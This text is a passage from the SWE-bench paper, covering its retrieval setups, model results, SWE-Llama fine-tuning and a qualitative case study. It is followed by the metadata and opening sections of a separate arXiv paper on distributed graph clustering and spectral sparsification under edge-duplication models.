\(40\%\) of instances have at least two fail-to-pass tests. These tests evaluate whether the model addressed the problem in the issue. In addition, a median of \(51\) additional tests run to check whether prior functionality is properly maintained. **Cross-context code editing.** Unlike prior settings that may constrain scope to a function or class (e.g., Chen et al., 2021; Cassano et al., 2022) or provide _cloze_-style fill-in blanks (e.g., Lu et al., 2021; Fried et al., 2023), SWE-bench does not provide such explicit guidance. Rather than merely having to produce a short code snippet, our benchmark challenges models to generate revisions in multiple locations of a large codebase. SWE-bench's reference solutions average editing \(1.7\) files, \(3.0\) functions, and \(32.8\) lines (added or removed). 
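A schematic sketch of the execution-based evaluation described in the task formulation above: the model-generated patch is applied with the unix `patch` program, the task's tests are run, and the instance counts as resolved only if the patch applies cleanly and every associated test passes. The helper names and test command are placeholders, not the benchmark's actual harness.

```python
# Apply a generated patch and check whether the instance is resolved.
import subprocess

def apply_patch(repo_dir: str, patch_file: str) -> bool:
    """Apply a unified diff with `patch -p1`; return True on success."""
    proc = subprocess.run(["patch", "-p1", "-i", patch_file],
                          cwd=repo_dir, capture_output=True, text=True)
    return proc.returncode == 0

def run_tests(repo_dir: str, test_cmd: list[str]) -> bool:
    """Placeholder: run the repository's own test framework (e.g. pytest) and
    return True iff all fail-to-pass and pass-to-pass tests succeed."""
    proc = subprocess.run(test_cmd, cwd=repo_dir, capture_output=True, text=True)
    return proc.returncode == 0

def is_resolved(repo_dir: str, model_patch: str, test_cmd: list[str]) -> bool:
    return apply_patch(repo_dir, model_patch) and run_tests(repo_dir, test_cmd)

# The benchmark metric is then the fraction of task instances resolved, e.g.:
# resolved_rate = sum(is_resolved(...) for inst in instances) / len(instances)
```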
**Wide scope for possible solutions.** The task of repository-scale code editing can serve as a level playing field to compare approaches ranging from retrieval and long-context models to decision-making agents, which could reason and act in code. SWE-bench also allows creative freedom, as models can generate novel solutions that may deviate from the reference PR. ## 3 SWE-Llama: Fine-tuning CodeLlama for SWE-bench It is important to benchmark the performance of open models on SWE-bench alongside proprietary models. At the time of writing, only the CodeLlama models (Roziere et al., 2023) are able to handle the very long contexts necessary. However, we observe that the off-the-shelf CodeLlama variants are not capable of following the detailed instructions to generate repository-wide code edits, and typically output placeholder responses or unrelated code. To evaluate the capabilities of these models, we perform supervised fine-tuning on the \(7\) billion- and \(13\) billion-parameter CodeLlama Python models. The resulting models are specialized repository editors that can run on consumer hardware and resolve GitHub issues. **Training data.** We follow our data collection procedure and collect \(19{,}000\) issue-PR pairs from an additional 37 popular Python package repositories. In contrast to Section 2.1, we do not require that pull requests contribute test changes. This allows us to create a much larger training set to use for supervised fine-tuning. To minimize the risk of any data contamination, the set of repositories in the training data are disjoint from the packages included in the evaluation benchmark. **Training details.** Given the instructions, an issue text from GitHub and the relevant code files as the prompt, we finetune SWE-Llama to generate the patch that solved the given issue (the "gold patch"). For memory efficiency, we fine-tune only the weights of the attention sublayer using LoRA Hu et al. (2022), and exclude training sequences with more than \(30{,}000\) tokens, reducing the effective size of the training corpus to \(10{,}000\) instances. More details are provided in Appendix B. ## 4 Experimental Setup In this section we explain how inputs are constructed to run SWE-bench evaluation. In addition, we review the models that we evaluate in this work. ### Retrieval-Based Approach SWE-bench instances provide an issue description and a codebase as input to the model. While issues descriptions are usually short (\(195\) words on average as shown in Table 1), codebases consist of many more tokens (\(438\)K lines on average) than can typically be fit into an LMs context window. Then the question remains of exactly how to choose the relevant context to provide to the model during generation? To address this issue for our baselines, we simply use a generic retrieval system to select the files to insert as context. In particular, we evaluate models under two relevant context settings: 1) sparse retrieval and 2) an oracle retrieval. **Sparse retrieval.** Dense retrieval methods are ill-suited to our setting due to very long key and query lengths, and especially the unusual setting of retrieving code documents with natural language queries. Therefore, we choose to use BM25 retrieval (Robertson et al., 2009) to retrieve relevant files to provide as context for each task instance. We experiment with three different maximum context limits, and simply retrieve as many files as fits within the specified limit. 
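A minimal sketch of this kind of file-level BM25 retrieval, assuming the third-party `rank_bm25` package; the whitespace tokenizer and token-budget handling are simplifications rather than the exact experimental setup.

```python
# Rank codebase files against the issue text and fill a context budget.
from rank_bm25 import BM25Okapi

def tokenize(text: str) -> list[str]:
    return text.lower().split()

def retrieve_files(issue_text: str, files: dict[str, str], max_tokens: int) -> list[str]:
    """Score every file with BM25 against the issue and keep as many
    top-ranked files as fit within a rough token budget."""
    paths = list(files)
    bm25 = BM25Okapi([tokenize(files[p]) for p in paths])
    scores = bm25.get_scores(tokenize(issue_text))
    ranked = sorted(zip(scores, paths), reverse=True)
    selected, used = [], 0
    for _, path in ranked:
        cost = len(tokenize(files[path]))
        if used + cost > max_tokens:
            break
        selected.append(path)
        used += cost
    return selected
```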
We evaluate each model on all limits that fit within its context window and report the best performance. **"Oracle" retrieval.** We additionally consider a setting where we only use all files edited by the reference patch that solved the issue on GitHub. This "oracle" retrieval setting is less realistic, since a software engineer working on addressing an issue does not know a priori which files may need to be modified. However, this setting is also not necessarily comprehensive since edited files alone may not include all the required context to understand exactly how software will behave when interacting with unseen parts of the code. \begin{table} \begin{tabular}{l l r r} \hline \hline & & Mean & Max \\ \hline Issue Text & Length (Words) & 195.1 & 4477 \\ \hline \multirow{2}{*}{Codebase} & \# Files (non-test) & 3,010 & 5,890 \\ & \# Lines (non-test) & 438K & 886K \\ \hline \multirow{2}{*}{Gold Patch} & \# Lines edited & 32.8 & 5888 \\ & \# Files edited & 1.7 & 31 \\ & \# Func. edited & 3 & 36 \\ \hline \multirow{2}{*}{Tests} & \# Fail to Pass & 9.1 & 1633 \\ & \# Total & 120.8 & 9459 \\ \hline \hline \end{tabular} \end{table} Table 1: Average and maximum numbers characterizing different attributes of a SWE-bench task instance. Statistics are micro-averages calculated without grouping by repository. Figure 3: Distribution of SWE-bench tasks (in parenthesis) across 12 open source GitHub repositories that each contains the source code for a popular, widely downloaded PyPI package. We compare the BM25 retrieval results against the "oracle" retrieval setting in Table 3, where we see that BM25 retrieves a superset of the oracle files in about \(40\%\) of instances with the \(27{,}000\) token context limit but only also excludes all of the oracle files in over half of instances. ### Input Format Once the retrieved files are selected using one of the two methods above, we construct the input to the model consisting of task instructions, the issue text, retrieved files and documentation, and finally an example patch file and prompt for generating the patch file. Examples of instances and further details on this formulation are provided in Appendix D. ### Models Due to the need to process long sequence lengths, there are only a few models that are currently suitable for SWE-bench. Thus we evaluate ChatGPT-3.5 (gpt-3.5-turbo-16k-0613), GPT-4 (gpt-4-32k-0613), Claude 2, and SWE-Llama with their context limits shown in Table 2. ## 5 Results In this section, we report results for models in a multitude of settings with different retrieval mechanism and prompting style, then provide some analysis and insight into model performance and difficulty. We summarize models' performance on both the BM25 and "oracle" retrieval settings in Table 5. Across the board, models struggle significantly to resolve issues. The best performing model, Claude 2, only achieves a mere \(4.8\%\) pass rate using the "oracle" retrieval context. When evaluated in the BM25 retrieval setting, Claude 2's performance drops to \(1.96\%\). Performance in the BM25 retrieval setting highlights the importance of choosing appropriate context, which becomes a theme in our analysis that we discuss further below. **Difficulty differs across repositories.** When breaking performance down by repository we observe that all models show similar trends across different repositories. Despite this, the issues resolved by each model do not necessarily overlap extensively. 
For example, in the "oracle" setting Claude 2 and SWE-Llama 13b perform comparably, with each model resolving \(110\) and \(91\) instances respectively. Yet of these instances, Claude 2 only solves \(42\%\) of the instances solved by SWE-Llama. This may also be related to the presence of images in issues, which can be encoded into the issue markdown with embedded image links (i.e.!{image}[https://...]). Some repositories naturally feature more instances with images; for example \(32\)% of matplotlib and \(10\)% of seaborn instances contain embedded images in their issue text compared to just \(2\)% of all instances. Solving these instances may require multi-modal LMs or some kind of external tool use to process images. **Difficulty correlates with context length.** Models may be pre-trained on long sequences of code but are typically asked to generate single functions at a time with limited context provided to frame the question. Shown in Figure 5, we see that as total context length increases, Claude 2's performance drops considerably; behavior that is also observed in other models. In our evaluation settings, models see a lot of code that may not be directly related to solving the issue at hand, and they seem to frequently struggle with localizing problematic code needing to be updated. This result corroborates other studies showing that models can become distracted by additional context or as the target sequence moves earlier or later within the context window (Liu et al., 2023b). Even when increasing the maximum context size for BM25 would increase recall with respect to the oracle files, performance can still drop, as shown in Table 4, as models are simply ineffective at localizing problematic code in a sea of tokens. Further investigating this, we provide an input ablation on the "oracle" retrieval context, where retrieved files are collapsed entirely, except for the lines actually edited by the true pull request (with \(\pm 15\) lines of buffer) shown in Figure 6. In this setting, we see increases in performance, with GPT-4 jumping from \(1.3\%\) to \(3.4\%\) and Claude 2 from \(4.8\%\) to \(5.9\%\). **Difficulty does not correlate with issue resolution date.** In Table 7 we show model results in the "oracle" retrieval setting, partitioned by date, for PRs created before or after 2023. We find that for most models there's little difference in performance before or after this date, with the exception of GPT-4. We consider this result to be largely promising as it suggests that despite models having \begin{table} \begin{tabular}{l c c} \hline \hline \multirow{2}{*}{Model} & \multicolumn{2}{c}{“Oracle”-collapsed} \\ \cline{2-3} & Resolved & Applied \\ \hline \hline ChatGPT-3.5 & 1.0 & 23.2 \\ Claude 2 & **5.9** & **47.6** \\ GPT-4 & 3.4 & 18.8 \\ \hline \hline \end{tabular} \end{table} Table 6: We show the results for the “Oracle”-collapsed retrieval setting, which uses oracle files but collapses code that isn’t directly modified by the PR \(\pm 15\) lines. Figure 4: Resolution rate for three models across the 12 repositories represented in SWE-bench. Figure 5: We compare the performance of Claude 2 on tasks partitioned by total input length and by only the issue length. 
\begin{table} \begin{tabular}{l c c c c} \hline \hline & \multicolumn{2}{c}{BM25 Retrieval} & \multicolumn{2}{c}{“Oracle” Retrieval} \\ \cline{2-5} Model & \% Resolved & \% Apply & \% Resolved & \% Apply \\ \hline ChatGPT-3.5 & 0.20 & 10.50 & 0.52 & 12.38 \\ Claude 2 & **1.96** & 29.86 & **4.80** & 47.00 \\ GPT-4\({}^{*}\) & 0.00 & 4.50 & 1.74 & 13.20 \\ SWE-Llama 7b & 0.70 & 37.84 & 3.00 & **54.80** \\ SWE-Llama 13b & 0.70 & **39.41** & 4.00 & 52.10 \\ \hline \hline \end{tabular} \end{table} Table 5: We compare models against each other using the BM25 and oracle retrieval settings as described in Section 4. \({}^{*}\)Due to budget constraints we evaluate GPT-4 on a \(25\)% random subset of SWE-bench in the “oracle” and BM25 27K retriever settings only. been exposed to some version of an repository's codebase, they are unlikely to "cheat" to address issues simply by generating a more recent version of the repository. **Finetuned models are sensitive to context distribution shifts.** The finetuned models SWE-Llama 7b and 13b perform surprisingly poorly with BM25 retrieved context. As these models were finetuned using the "oracle" retrieval as context, we suspect this shift in context makes it difficult for the model to perform reliably. For instance, SWE-Llama was trained to edit every file included as context whereas in the BM25 setting many files provided in context are not expected to be changed. **Generating patches is easier than generating whole files.** Models are often trained using standard code files and likely rarely see patch files. We generally formulate our task to have models generate patch files as opposed to recreating the entire file with their proposed change, since patch files will usually be a much more efficient representation of a file change. As shown in Table 5, we observe that models still struggle with generating well-formatted patch files. So we experiment with asking models to instead regenerate entire files with their proposed changes to resolve the issue. In this setting, we find that models generally perform worse at this task than when generating patch files; for instance, Claude 2 scores at \(2.2\%\) compared to \(4.8\%\) in the main table for "oracle" retrieval. Even when controlling for instance length, generating on the shorter half of the task instances by input tokens yields \(3.9\%\) compared to \(7.8\%\) for generating patches with Claude 2. **Language models tend to generate shorter, simpler edits.** Model generated patch files tend to add and remove fewer lines than their respective gold patch. As shown in Table 8, compared to an average gold patch, model generated patch files that apply correctly are less than half the total length (\(74.5\) versus \(30.1\) lines) of gold edit patch files, and rarely edit more than a single file. ### A Qualitative Analysis of SWE-Llama Generations We select \(11\) generations from SWE-Llama and Claude 2 collectively to better understand the quality of the task and generated patches under the "oracle" retrieval setting. Here we discuss one example \begin{table} \begin{tabular}{l c c c c c} \hline \hline & Claude 2 & ChatGPT-3.5 & GPT-4\({}^{*}\) & SWE-Llama 7b & SWE-Llama 13b \\ \hline Before 2023 & **4.87** & 0.49 & **1.63** & **3.98** & 2.95 \\ From 2023 & 4.23 & **0.77** & 0.0 & 3.85 & **3.46** \\ \hline \hline \end{tabular} \end{table} Table 7: We compare model performance on task instances from before or after 2023. Most models show little difference in performance. 
\({}^{*}\)Due to budget constraints, GPT-4 is evaluated on a \(25\%\) random subset of SWE-bench tasks, which may impact performance here. \begin{table} \begin{tabular}{l c c c c c} \hline \hline Model & Total Lines & Added & Removed & Functions & Files \\ \hline Claude 2 & 19.6 & 4.2 & 1.9 & 1.1 & 1.0 \\ Gold & 44.1 & 12.0 & 5.8 & 2.1 & 1.2 \\ \hline ChatGPT-3.5 & 30.1 & 3.8 & 2.7 & 1.6 & 1.0 \\ Gold & 39.6 & 9.5 & 6.1 & 1.9 & 1.2 \\ \hline GPT-4 & 20.9 & 4.4 & 1.5 & 1.0 & 1.0 \\ Gold & 33.6 & 8.4 & 3.8 & 1.9 & 1.1 \\ \hline SWE-Llama 13b & 17.6 & 1.6 & 1.2 & 1.2 & 1.1 \\ Gold & 37.8 & 10.0 & 4.4 & 1.9 & 1.1 \\ \hline SWE-Llama 7b & 16.7 & 1.3 & 1.2 & 1.2 & 1.1 \\ Gold & 40.2 & 11.3 & 4.9 & 1.9 & 1.1 \\ \hline Avg Gold & 39.1 & 10.2 & 5.0 & 1.9 & 1.1 \\ All Gold & 74.5 & 22.3 & 10.5 & 3.0 & 1.7 \\ \hline \hline \end{tabular} \end{table} Table 8: Average edits of model generated patches in the oracle retrieval setting across successfully applied patches. For the task instances specific to each model, we calculate the same statistics across the gold patches. Avg Gold shows statistics macro-averaged over each models’ respective gold patches. All Gold shows statistics for all gold patches unconditioned on model performance. from SWE-Llama and summarize our overall findings, with in-depth analyses for the remaining examples shown in Appendix F. We'll consider the task instance sphinx-doc_sphinx-8713 from the Sphinx documentation generator, shown in Figure 6. The issue states that the napoleon extension of Sphinx is not properly formatting the documentation keyword "Other Parameters" when the config setting napoleon.use_param is set to True. The issue text further provides a detailed code snippet of where the problematic source code is suspected to be, as well as some code examples for reproducing the error and additional information related to package versions. For this particular instance, the model did not resolve the task, failing to pass some of the tests resolved by the gold solution. In the "oracle" retrieval setting, the model input provides this issue text along with some instructions, the full contents of files edited by the gold patch, and an example of the diff format we expect the answer to be in. The total model input consists of \(1{,}558\) lines of context or \(20{,}882\) tokens. When comparing the gold patch and the model's patch, we find an obvious mistake. While the model edits the correct function, parse_other_parameters_section at line \(684\) in sphinx/ext/napoleon/docstring.py, it changes the function to behave as if napoleon.use_param were always True instead of checking the config setting first and copying what the parse_parameters_section does, like the gold patch. In the tests, test_parameters_with_class_reference directly compares the documentation produced using a config where napoleon_use_param is set to False, which catches the model's error immediately. Comparing results across all the examples we consider, we notice a few prominent trends in behavior. Models tend to write primitive Python code and do not leverage existing third-party libraries or the rest of the codebase for their solutions. Models' generations also reflect a "greedy" approach of solving the problem _exactly_, with little regard for code style or logical constraints that might be reflected by the codebase (i.e. using relative instead of absolute imports). 
In contrast, we observe that many gold patches will make structural improvements that cover a much larger scope of the codebase; these edits not only resolve the issue, but also anticipate and solve obvious potential future issues. We present additional case studies and identify more nuanced discrepancies in Appendix F. ## 6 Related Work **Evaluation of LMs.** Several recent works for evaluating LMs have either proposed a collection of mutually distinct tasks spanning across multiple domains (Hendrycks et al., 2021; Liang et al., 2022; Srivastava et al., 2023) or turned to the web as an interactive setting featuring tasks that require multiple steps to solve (Yao et al., 2022; Zhou et al., 2023; Deng et al., 2023; Liu et al., 2023). There are several drawbacks with such a "potpourri" style setup. First, each task tends to narrowly focus on Figure 6: We show an example of an formatted task instance, a model prediction, and the testing framework logs. Results and inputs are stylized for readability. In the gold and generated patch file, red-highlighted lines represent deletions and green-highlighted lines represent additions. one or a few skills, resulting in challenges that are typically too simple, pigeonhole the model into a reduced role, and do not provide models with the bandwidth to exercise their versatility or potentially demonstrate new abilities (Srivastava et al., 2023). Consequently, a model's performance on such task conglomerations may not yield actionable, deep insights regarding its capabilities and how to improve them (Schlangen, 2019; Martinez-Plumed et al., 2021; Bowman and Dahl, 2021). SWE-bench addresses these shortcomings, as our work demonstrates that it is significantly challenging, presents a wide range of possibilities for improving LMs to solve this task, and is easy to refresh over time with new task instances, each of which introduce novel, nuanced, and practical challenges. **Code Generation Benchmarks.** HumanEval (Chen et al., 2021) is the current standard in a long-standing pursuit of synthesizing code from natural language descriptions (Yu et al., 2018; Austin et al., 2021; Hendrycks et al., 2021; Li et al., 2022; Zan et al., 2023). In the past year, subsequent benchmarks have sought to augment HumanEval with extensions to different languages (Cassano et al., 2022; Athiwaratkun et al., 2023; Orlanski et al., 2023), variations in edit scope (Yu et al., 2023; Du et al., 2023), similar but novel code completion tasks (Muennighoff et al., 2023), and more testing (Liu et al., 2023). Simultaneously, separate works have sought to introduce new coding paradigms (Yin et al., 2022; Yang et al., 2023) or design library-specific problems (Lai et al., 2022; Zan et al., 2022). Instead of partitioning problems into silced datasets and curtailing them for simplicity's sake, SWE-bench's collection procedure transforms the source code with minimal post-processing, preserving a much broader set of challenges grounded in real-world software engineering beyond closed form completion, such as patch generation, reasoning over long contexts, navigating a codebase directory, and capturing dependency-based relationships across modules. **ML for Software Engineering.** To overcome traditional program analysis techniques that may not scale or incorporate natural language, one direction of current software engineering research has is to use neural networks, including LMs, to automate real-world software development processes (Maniatis et al., 2023; Zheng et al., 2023; Hou et al., 2023). 
Use cases include automating commit generation (Jung, 2021; Liu et al., 2023; Liu et al., 2023), PR review (Yang et al., 2016; Li et al., 2022; Tufano et al., 2021), bug localization Kim et al. (2019); Chakraborty et al. (2018), testing (Kang et al., 2023; Xia et al., 2023; Wang et al., 2023), and program repair (Monperrus, 2018; Gupta et al., 2017; Allamanis et al., 2017; Gazzola et al., 2019; Goues et al., 2019; Gao et al., 2022; Dinh et al., 2023; Motwani and Brun, 2023). Most relevant to SWE-bench are works that have sought to apply LMs towards automated program repair (Xia and Zhang, 2022; 2023; Fan et al., 2023), guiding code editing with commits (Chakraborty and Ray, 2021; Zhang et al., 2022; Fakhoury et al., 2023). However, none of the existing datasets (Just et al., 2014; Karampatsis and Sutton, 2019) present code context at the scale of SWE-bench. Moreover, SWE-bench isolates the changes at the function level, and can be easily extended to new programming languages and other software modalities. SWE-bench is compatible with such works, but provides a significantly more realistic and challenging arena to carry out future experiments towards augmenting LMs with software engineering tools and practices. ## 7 Discussion **Limitations and future directions.** SWE-bench task instances are all in Python; we hope to apply SWE-bench's task instance collection procedure to expand its coverage to more programming languages and domains. Second, our experiments aim to establish a baseline of the simplest and most straight-forward approaches for this task; we do not intend to constrain future methodologies to the same type of approach and encourage future work to investigate different methods. To this end, we are particularly excited about agent-based approaches for identifying relevant context from a codebase, larger scale models fine-tuned for patch generation, and augmenting LMs with program analysis and software engineering tools. Lastly, while this work evaluates models using execution-based code testing, relying solely on this method is insufficient to guarantee reliable performance of model generations, as we find automated code generations from LMs can frequently be less comprehensive, efficient, or readable compared to human-written solutions. **Conclusion.** The complexity of real-world software development processes extends far beyond just code completion. By drawing on the open-source collaborative pipeline, SWE-bench creates a faithful mirror of real world coding environments. This more realistic environment encourages creative solutions that can have immediate applicability in open-source software development. We hope that this benchmark and our other contributions can serve as valuable assets in the future development of LMs that are more practical, intelligent, and autonomous. Ethics Statement SWE-bench is collected entirely from public repositories with licenses that permit software usage that our contributions are in accordance with. Details of the licenses are included in Table 12. During the collection or evaluation processes, we do not collect information about GitHub users, and the SWE-bench task instances do not use GitHub data beyond what is offered via the public API and website. Our contributions do not involve any human subject participation; we do not perform crowdsourcing or recruit human task workers for any part of SWE-bench, including its collection and evaluation procedures along with the experiments. 
SWE-bench's filtering criteria for GitHub repositories based on popularity does not implicitly or explicitly rely on any discriminative or biased heuristics for repository selection. For the dataset release, we plan to open source the SWE-bench task instances, the collection and evaluation infrastructure, the experimental results, the training data used for fine-tuning SWE-Llama models, and the SWE-Llama model weights. Following best practice precedents, we will also put forth ample documentation to describe each component and its use, and we will also put in place convenient communication channels for soliciting feedback to improve SWE-bench. SWE-bench does not put forth any immediately harmful insights. We briefly discuss the potential impact of SWE-bench's usage in Section E. ## 9 Reproducibility Statement For our submission, we have uploaded the entirety of the source code as a zipped file that has been properly anonymized. We have organized the codebase such that separate directories correspond to different contributions within the main paper (i.e. dataset collection, evaluation, open source model inference, SWE-Llama training, etc.). The source code contains inline documentation that details purpose and usage of different parts of the codebase. In addition, we also include the full set of 2294 SWE-bench task instances that contains all the components discussed in the main paper. Beyond the documentation in the source code, we include thorough technical details for the collection pipeline and evaluation procedures in Section A.2 and Section A.4 that complements the original details in Section 2 of the main paper. These sections fully cover the logic presented in the code and can be helpful for understanding it. Moving forward, as discussed in the ethics statement, we plan to more formally release SWE-bench to the public as an open source repository with thorough details that describes the benchmark, outlines the code, and details its usage. A major component of SWE-bench is the collection framework, which will be part of the open sourced code. Because of its easily maintainable design, as discussed in the main paper, our hope and belief is that SWE-bench should be highly reproducible. ## 10 Acknowledgements We thank Danqi Chen, Tri Dao, Zexuan Zhong, Tianyu Gao, Will Merrill, Mengzhou Xia, Dan Friedman, Adithya Bhaskar, Austin Watkins, Aatmik Gupta, and Richard Zhu for their valuable feedback and advice.
2302.09652
Communication-Efficient Distributed Graph Clustering and Sparsification under Duplication Models
In this paper, we consider the problem of clustering graph nodes and sparsifying graph edges over distributed graphs, when graph edges with possibly edge duplicates are observed at physically remote sites. Although edge duplicates across different sites appear to be beneficial at the first glance, in fact they could make the clustering and sparsification more complicated since potentially their processing would need extra computations and communications. We propose the first communication-optimal algorithms for two well-established communication models namely the message passing and the blackboard models. Specifically, given a graph on $n$ nodes with edges observed at $s$ sites, our algorithms achieve communication costs $\tilde{O}(ns)$ and $\tilde{O}(n+s)$ ($\tilde{O}$ hides a polylogarithmic factor), which almost match their lower bounds, $\Omega(ns)$ and $\Omega(n+s)$, in the message passing and the blackboard models respectively. The communication costs are asymptotically the same as those under non-duplication models, under an assumption on edge distribution. Our algorithms can also guarantee clustering quality nearly as good as that of centralizing all edges and then applying any standard clustering algorithm. Moreover, we perform the first investigation of distributed constructions of graph spanners in the blackboard model. We provide almost matching communication lower and upper bounds for both multiplicative and additive spanners. For example, the communication lower bounds of constructing a $(2k-1)$-spanner in the blackboard with and without duplication models are $\Omega(s+n^{1+1/k}\log s)$ and $\Omega(s+n^{1+1/k}\max\{1,s^{-1/2-1/(2k)}\log s\})$ respectively, which almost match the upper bound $\tilde{O}(s+n^{1+1/k})$ for both models.
Chun Jiang Zhu
2023-02-19T18:46:24Z
http://arxiv.org/abs/2302.09652v1
# Communication-Efficient Distributed Graph Clustering and Sparsification under Duplication Models + ###### Abstract In this paper, we consider the problem of clustering graph nodes and sparsifying graph edges over distributed graphs, when graph edges with possibly edge duplicates are observed at physically remote sites. Although edge duplicates across different sites appear to be beneficial at the first glance, in fact they could make the clustering and sparsification more complicated since potentially their processing would need extra computations and communications. We propose the first communication-optimal algorithms for two well-established communication models namely the message passing and the blackboard models. Specifically, given a graph on \(n\) nodes with edges observed at \(s\) sites, our algorithms achieve communication costs \(\tilde{O}(ns)\) and \(\tilde{O}(n+s)\) (\(\tilde{O}\) hides a polylogarithmic factor), which almost match their lower bounds, \(\Omega(ns)\) and \(\Omega(n+s)\), in the message passing and the blackboard models respectively. The communication costs are asymptotically the same as those under non-duplication models, under an assumption on edge distribution. Our algorithms can also guarantee clustering quality nearly as good as that of centralizing all edges and then applying any standard clustering algorithm. Moreover, we perform the first investigation of distributed constructions of graph spanners in the blackboard model. We provide almost matching communication lower and upper bounds for both multiplicative and additive spanners. For example, the communication lower bounds of constructing a \((2k-1)\)-spanner in the blackboard with and without duplication models are \(\Omega(s+n^{1+1/k}\log s)\) and \(\Omega(s+n^{1+1/k}\max\{1,s^{-1/2-1/(2k)}\log s\})\) respectively, which almost match the upper bound \(\tilde{O}(s+n^{1+1/k})\) for both models. **Keywords:** Distributed Graph Clustering, Graph Sparsification, Spectral Sparsifiers, Graph Spanners ## 1 Introduction Graph clustering is one of the most fundamental tasks in machine learning. Given a graph consisting of a node set and an edge set, graph clustering asks to partition graph nodes into clusters such that nodes within the same cluster are "densely-connected" by graph edges, while nodes in different clusters are "loosely-connected". Graph clustering on modern large-scale graphs imposes high computational and storage requirements, which are too expensive to obtain from a single machine. In contrast, distributed computing clusters and server storage are a popular and cheap way to meet the requirements. Distributed graph clustering has received considerable research interests, _e.g._, [13, 14, 15]. Interestingly, these works show their close relationships with (distributed) graph sparsification. Graph sparsification is the task of approximating an arbitrary graph by a sparse graph that has a reduced number of edges while approximately preserving certain property. It is often useful in the design of efficient approximation algorithms, since most algorithms run faster on sparse graphs than the original graphs. Several notions of graph sparsification have been proposed. Spectral sparsifiers [13] well approximate the spectral property of the original graphs and can be used to approximately solve linear systems over graph Laplacian, and to approximate effective resistances, spectral clustering, and random walk properties [13, 14]. 
On the other hand, graph spanners are a type of graph sparsifiers that well approximate shortest-path distances in the original graph. A subgraph \(H\) of an undirected graph \(G\) is called a \(k\)-spanner of \(G\) if the distance between any pair of vertices in \(H\) is no larger than \(k\) times of that in \(G\), and \(k\) is called the _stretch_ factor. It is well known that for any \(n\)-vertex graph, there exists a spanner of stretch \(2k-1\) and size (the number of edges) \(O(n^{1+1/k})\)[15]. This is optimal if we believe the Erdos's girth conjecture [1]. Many research efforts were then devoted to _additive spanners_, where the distance between any vertex pair is no larger by an additive term \(\beta\) instead of a multiplicative factor. Here the spanner is called a \(+\beta\)-spanner. There have been different constructions of \(+2\)-, \(+4\)-, \(+6\)-spanners of size \(O(n^{3/2})\), \(O(n^{7/5})\), and \(O(n^{4/3})\), respectively [1, 2]. Spanners have found a wide range of applications in network routing, synchronizers and broadcasting, distance oracles, and preconditioning of linear systems [15, 2]. In an \(n\)-vertex distributed graph \(G(V,E)\), each of \(s\) sites, \(S_{i}\), holds a subset of edges \(E_{i}\subseteq E\) on a common vertex set \(V\) and their union is \(E=\cup_{i=1}^{s}E_{i}\). We consider two well-established models of communication, the _message passing_ model and _blackboard_ model, following the above work. In the former, there is a communication channel between every site and a distinguished coordinator. Each site can send a message to another site by first sending to the coordinator, who then forwards the message to the destination. In the latter, sites communicate with each other through a shared blackboard such as a broadcast channel. The models can be further considered in two settings: edge sets of different sites are disjoint (_non-duplication_ models) and they can have non-empty intersection (_duplication_ models). Here the major objective is to minimize the communication cost that is usually measured by the total number of bits communicated. A typical framework of distributed graph clustering is to employ graph sparsification tools to significantly reduce the size of edge sets of different sites while keeping structural properties. [17] proposed to compute spectral sparsifiers for the graphs at different sites and transmit them to the coordinator. Upon receiving all sparsifiers, the coordinator takes their union and applies a standard clustering algorithm, _e.g._, [11]. However, all the existing methods that follow this framework such as [17, 18] only work in non-duplication models. The assumption that edge sets of different sites are disjoint is crucial to get the _decomposability_ of spectral sparsifiers: the union of spectral sparsifiers of subgraphs at different sites is a spectral sparsifier of the distributed graph. Unfortunately, the decomposability does not work in duplication models. When edge sets of different sites have non-empty intersection, it is unclear how to process edge "duplicates" that are possible to have different edge weights after sparsification. See Figure 1 for a concrete example. To the best of our knowledge, none of the existing algorithms can perform distributed graph clustering in the more general duplication models with reasonable theoretical guarantees on both communication cost and clustering quality. 
Instead of trying to restore the decomposability and reuse this framework, our algorithms are built on the construction of spectral sparsifiers from graph spanners [10]. Adapting the algorithm to the duplication models needs new algorithmic procedures such as weighted graph spanners and uniform sampling. Although distributed constructions of graph spanners have been studied in the message passing and CONGEST models [1, 2, 13], they have unfortunately not been systematically studied in the blackboard model. The blackboard model represents distributed systems with a broadcast channel. It can be viewed as a model for single-hop wireless networks and has received growing research interest [17, 2]. In the second part of this paper, we also investigate the problem of constructing graph spanners in the blackboard model, both with and without duplication, and obtain several almost matching communication lower and upper bounds.

**Our Contributions.** We perform the first investigation of distributed graph clustering and spectral sparsification under duplication models. We propose communication-optimal (up to a polylogarithmic factor) algorithms with communication costs \(\tilde{O}(ns)\) and \(\tilde{O}(n+s)\) in the message passing and blackboard models with duplication, respectively. Interestingly, the communication costs are asymptotically the same as those in the non-duplication models under an assumption on the edge distribution: the probability of an edge residing at each of the sites is a known value. This is practical when the popularity or degree of duplication of edges is obtainable. It is guaranteed that the quality of our clustering results is nearly as good as the simple method of centralizing all edge sets at different sites and then applying a standard clustering algorithm, _e.g._, [11]. Furthermore, we study distributed constructions of graph spanners in the blackboard model with and without edge duplication in order to improve our limited understanding of their communication complexity. Table 1 summarizes our main findings and Table 2 provides the communication complexity in the message passing model [2]. We confirm that the blackboard model is able to significantly reduce the communication complexity compared to the message passing model. Unlike distributed clustering and spectral sparsification, edge duplication potentially brings more communication for the distributed spanner construction problem. See the detailed discussions in Section 4.

**Related Work.** There has been extensive research on graph clustering in the distributed setting, _e.g._, [13, 14, 15, 16]. [13] proposed a divide-and-conquer method for distributed graph clustering. [14] used spectral sparsifiers in graph clustering for two distributed communication models to reduce communication cost. [15] presented a computationally and communication efficient node-degree-based sampling scheme for distributed graph clustering. [16] studied distributed dynamic graph clustering based on the monotonicity property of graph sparsification. However, all these methods assume that there are no edge duplicates across different sites and do not work in the more general duplication setting. Graph spanners have been studied in the non-distributed model [16, 1] and a few distributed models [1, 17]. [18] studied distributed constructions of pair-wise spanners that approximate distances only for some pairs of vertices in the CONGEST model.
